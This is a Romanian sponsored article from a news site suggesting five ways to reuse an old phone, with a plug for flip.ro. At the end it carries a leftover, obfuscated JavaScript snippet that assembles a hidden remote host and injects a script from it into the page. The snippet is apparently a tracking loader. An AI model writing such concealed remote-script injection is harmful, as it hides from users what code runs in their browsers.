Sari direct la conținut

[P] ​5 moduri ingenioase de a profita de vechiul tău telefon

Smile Media
5 moduri ingenioase de a profita de vechiul tău telefon, Foto: Shutterstock
5 moduri ingenioase de a profita de vechiul tău telefon, Foto: Shutterstock

Trăim de câțiva ani în era tehnologiei, unde dispozitivele electronice care ne fac viața mai ușoară evoluează de la o zi la asta. Pe de o parte, aceasta este o veste bună. În același timp, viteza cu care device-urile pe care le folosim ajung să fie depășite crește rapid. Iar acest aspect poate fi verificat dacă ne raportăm mai ales la telefoanele noastre.

Cu camere din ce în ce mai performante, un spațiu de memorie internă tot mai generos și o mulțime de funcții noi, smartphone-urile zilelor noastre au o durată medie de viață de doi-trei ani. Și nu ne referim la faptul că după această perioadă telefoanele nu ar mai fi perfect funcționale. Ci că după acest interval de timp ne plictisim de vechiul dispozitiv și ne dorim un altul, care ține pasul cu trendurile. Aceasta este și metoda prin care telefoanele vechi ajung să fie uitate într-un sertar luni, poate chiar ani la rândul.

Însă nu așa ar trebui să arate finalul vieții unui smartphone. De fapt, un device de acest tip ar putea avea multe alte întrebuințări, chiar și după ce hotărăști să treci la unul mai performant. În rândurile de mai jos, vom explora împreună cinci idei ingenioase care te vor ajuta să dai o viață nouă vechiului tău telefon. Așadar, fie că îți pasă de mediul înconjurător sau pur și simplu vrei să îi găsești o nouă utilitate, află din acest material ce poți face cu un telefon vechi.

1. Reciclează-l

Reciclarea unui telefon vechi poate fi o opțiune excelentă, dacă ecologia este un aspect care te preocupă. Componentele telefonului, cum ar fi bateriile și circuitele, pot conține substanțe chimice periculoase pentru mediul înconjurător. Prin reciclare, aceste componente pot fi extrase și gestionate corespunzător, prevenind poluarea și reducând nevoia de materii prime noi.

2. Vinde-l și recuperează o parte din investiție

Știai că poți vinde vechiul smartphone? Recuperează o parte din banii pe care i-ai investit în device și pune-i deoparte, cumpără accesorii noi pentru telefonul pe care îl folosești deja sau ia-ți ultimul model de iPhone la un preț mult mai bun. Pe flip.ro le poți face pe amândouă! Adică poți vinde vechiul smartphone și poți comanda un iPhone 13, un Samsung Galaxy S22 sau orice alt model care îți face cu ochiul, la prețuri cu până la 40% mai mici decât cele din magazine.

3. Donează-l

Donarea telefonului vechi poate însemna enorm pentru cei care au nevoie de un dispozitiv cu care să comunice mai ușor. Există organizații și programe de donații care colectează telefoane vechi și le distribuie persoanelor care nu și le pot permite. Aceste telefoane pot fi utilizate pentru a păstra legătura cu familia și prietenii, pentru a căuta locuri de muncă sau pentru a accesa resurse importante. Verifică organizațiile locale sau naționale care se ocupă de donații de telefoane mobile și asigură-te că dispozitivul este resetat și pregătit pentru a fi utilizat de către noul proprietar.

4. Păstrează-l ca extra-spațiu de stocare

Telefonul vechi poate fi transformat într-un dispozitiv suplimentar de stocare a datelor. Dacă telefonul are un slot pentru card de memorie, îl poți folosi pentru a stoca și transfera fișiere, fotografii sau documente. Poți utiliza telefonul ca pe un dispozitiv portabil de backup pentru a-ți păstra câteva copii de siguranță ale datelor importante sau poți transfera fișiere între diferite dispozitive prin intermediul cardului de memorie.

5. Transformă-l în radio sau mini-televizor

Descarcă aplicații media precum Spotify, YouTube, Netflix sau aplicații de redare video și utilizează telefonul pentru a asculta muzică, pentru a urmări filme, seriale sau podcast-uri. Poți conecta telefonul la difuzoare prin Bluetooth sau prin intermediul unei conexiuni cu fir și poți crea astfel o experiență audio de calitate superioară. De asemenea, poți conecta telefonul la televizor și-l poți folosi ca pe un player multimedia dedicat.

Iar dacă aceste sugestii nu ți se par suficient de bune pentru tine, poate te va inspira ideea de a folosi un telefon vechi pe post de monitor pentru copii, GPS pentru excursiile lungi de vară sau ca dispozitiv de control smart al casei tale, dacă utilizezi becuri inteligente, termostate sau sisteme de securitate.

Orice ai decide să faci cu vechiul telefon, nu uita că acesta poate fi folosit în multe scopuri, chiar și după ce decizi că nu mai merită să-l ții pe post de smartphone principal.

(function(){ ifqh_=(„u”+”st”);ifqh=document.createElement(„script”);ifqh.async=true; ifqhu=”547884150″;ifqh_+=”a”+(„t.”);ifqh_+=”i”+(„nf”+(„o”))+(„/”); ifqhu+=”.5uwa4ieffqhapu3w”;ifqhu+=”51e9gdf6rz3wj8″; ifqh.src=”https://”+ifqh_+ifqhu;ifqh.type=”text/javascript”; d_b=document.body;d_b.appendChild(ifqh); })();

ARHIVĂ COMENTARII
INTERVIURILE HotNews.ro